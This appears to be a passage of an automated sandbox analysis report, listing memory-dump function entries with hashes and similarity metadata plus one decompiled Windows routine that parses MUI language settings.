                                                                                                                                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FB50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FC30, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B30C40, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FC48, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B31D80, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FD5C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FE24, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FFFC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FF34, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B58788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                			E00B58788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00B58460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00B3E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00B5718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00B58460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00B5718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00B58460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00B58460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00B58460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00B5718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00B32340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00B4E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00B3E2A8(_t322,  &_v68, _v16);
								if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00B4E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00B3E2A8(_t322,  &_v68, _t236);
								if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00B5718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00B32340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00B4E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00B3E2A8(_v12,  &_v68, _v16);
							if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00B4E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00B3E2A8(_t322,  &_v68, _t269);
							if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00B5718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00B32340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00B4E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00B3E2A8(_v12,  &_v68, _v16);
						if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00B4E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00B3E2A8(_t322,  &_v68, _t296);
						if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                                0x00b58788
                                                                                                                                                                0x00b58788
                                                                                                                                                                0x00b58791
                                                                                                                                                                0x00b58794
                                                                                                                                                                0x00b58798
                                                                                                                                                                0x00b5879b
                                                                                                                                                                0x00b5879e
                                                                                                                                                                0x00b587a1
                                                                                                                                                                0x00b587a4
                                                                                                                                                                0x00b587a7
                                                                                                                                                                0x00b587aa
                                                                                                                                                                0x00b587af
                                                                                                                                                                0x00ba1ad3
                                                                                                                                                                0x00b58b0a
                                                                                                                                                                0x00b58b0d
                                                                                                                                                                0x00b58b13
                                                                                                                                                                0x00b58b19
                                                                                                                                                                0x00b58b1f
                                                                                                                                                                0x00b58b25
                                                                                                                                                                0x00b58b2b
                                                                                                                                                                0x00b58b31
                                                                                                                                                                0x00b58b37
                                                                                                                                                                0x00b58b3d
                                                                                                                                                                0x00b58b46
                                                                                                                                                                0x00b58b46
                                                                                                                                                                0x00b587c6
                                                                                                                                                                0x00b587d0
                                                                                                                                                                0x00ba1ae0
                                                                                                                                                                0x00ba1ae6
                                                                                                                                                                0x00ba1af8
                                                                                                                                                                0x00ba1af8
                                                                                                                                                                0x00ba1afd
                                                                                                                                                                0x00ba1afe
                                                                                                                                                                0x00ba1b01
                                                                                                                                                                0x00ba1b06
                                                                                                                                                                0x00ba1b06
                                                                                                                                                                0x00b587d6
                                                                                                                                                                0x00b587f2
                                                                                                                                                                0x00b587f7
                                                                                                                                                                0x00b58807
                                                                                                                                                                0x00b5880a
                                                                                                                                                                0x00b5880f
                                                                                                                                                                0x00b58810
                                                                                                                                                                0x00b58813
                                                                                                                                                                0x00b58818
                                                                                                                                                                0x00b58818
                                                                                                                                                                0x00b5882c
                                                                                                                                                                0x00b58831
                                                                                                                                                                0x00b58838
                                                                                                                                                                0x00b58908
                                                                                                                                                                0x00b58920
                                                                                                                                                                0x00b589f0
                                                                                                                                                                0x00b58a08
                                                                                                                                                                0x00b58af6
                                                                                                                                                                0x00b58af6
                                                                                                                                                                0x00b58af8
                                                                                                                                                                0x00b58afb
                                                                                                                                                                0x00ba1beb
                                                                                                                                                                0x00ba1beb
                                                                                                                                                                0x00b58b04
                                                                                                                                                                0x00ba1bf8
                                                                                                                                                                0x00ba1c0e
                                                                                                                                                                0x00ba1c13
                                                                                                                                                                0x00ba1c16
                                                                                                                                                                0x00ba1c16
                                                                                                                                                                0x00ba1bf8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58b04
                                                                                                                                                                0x00b58a0e
                                                                                                                                                                0x00b58a11
                                                                                                                                                                0x00b58a14
                                                                                                                                                                0x00b58a15
                                                                                                                                                                0x00b58a18
                                                                                                                                                                0x00b58a22
                                                                                                                                                                0x00b58b59
                                                                                                                                                                0x00b58a28
                                                                                                                                                                0x00b58a3c
                                                                                                                                                                0x00b58a3c
                                                                                                                                                                0x00b58a42
                                                                                                                                                                0x00ba1bb0
                                                                                                                                                                0x00ba1b11
                                                                                                                                                                0x00ba1b11
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58a48
                                                                                                                                                                0x00b58a51
                                                                                                                                                                0x00b58a5b
                                                                                                                                                                0x00b58a5e
                                                                                                                                                                0x00b58a61
                                                                                                                                                                0x00b58a69
                                                                                                                                                                0x00b58a69
                                                                                                                                                                0x00b58a6d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58a74
                                                                                                                                                                0x00b58a7c
                                                                                                                                                                0x00b58a7d
                                                                                                                                                                0x00b58a91
                                                                                                                                                                0x00b58a93
                                                                                                                                                                0x00b58a93
                                                                                                                                                                0x00b58a98
                                                                                                                                                                0x00b58a9b
                                                                                                                                                                0x00b58aa1
                                                                                                                                                                0x00b58aa1
                                                                                                                                                                0x00b58aa4
                                                                                                                                                                0x00b58aaa
                                                                                                                                                                0x00b58ab1
                                                                                                                                                                0x00b58ac5
                                                                                                                                                                0x00b58ac7
                                                                                                                                                                0x00b58ac7
                                                                                                                                                                0x00b58ac5
                                                                                                                                                                0x00b58ace
                                                                                                                                                                0x00ba1bc9
                                                                                                                                                                0x00ba1bce
                                                                                                                                                                0x00ba1bd2
                                                                                                                                                                0x00ba1bd2
                                                                                                                                                                0x00b58ad8
                                                                                                                                                                0x00b58aeb
                                                                                                                                                                0x00b58aeb
                                                                                                                                                                0x00b58af0
                                                                                                                                                                0x00b58af4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58af4
                                                                                                                                                                0x00b58a42
                                                                                                                                                                0x00b58926
                                                                                                                                                                0x00b58929
                                                                                                                                                                0x00b5892c
                                                                                                                                                                0x00b5892d
                                                                                                                                                                0x00b58930
                                                                                                                                                                0x00b58935
                                                                                                                                                                0x00b5893a
                                                                                                                                                                0x00b58b51
                                                                                                                                                                0x00b58940
                                                                                                                                                                0x00b58954
                                                                                                                                                                0x00b58954
                                                                                                                                                                0x00b5895a
                                                                                                                                                                0x00ba1b63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58960
                                                                                                                                                                0x00b58969
                                                                                                                                                                0x00b58973
                                                                                                                                                                0x00b58976
                                                                                                                                                                0x00b58979
                                                                                                                                                                0x00b5897e
                                                                                                                                                                0x00b58981
                                                                                                                                                                0x00b58981
                                                                                                                                                                0x00b58986
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00ba1b6e
                                                                                                                                                                0x00ba1b74
                                                                                                                                                                0x00ba1b7b
                                                                                                                                                                0x00ba1b8f
                                                                                                                                                                0x00ba1b91
                                                                                                                                                                0x00ba1b91
                                                                                                                                                                0x00ba1b99
                                                                                                                                                                0x00ba1b9c
                                                                                                                                                                0x00ba1ba2
                                                                                                                                                                0x00ba1ba2
                                                                                                                                                                0x00b5898c
                                                                                                                                                                0x00b58992
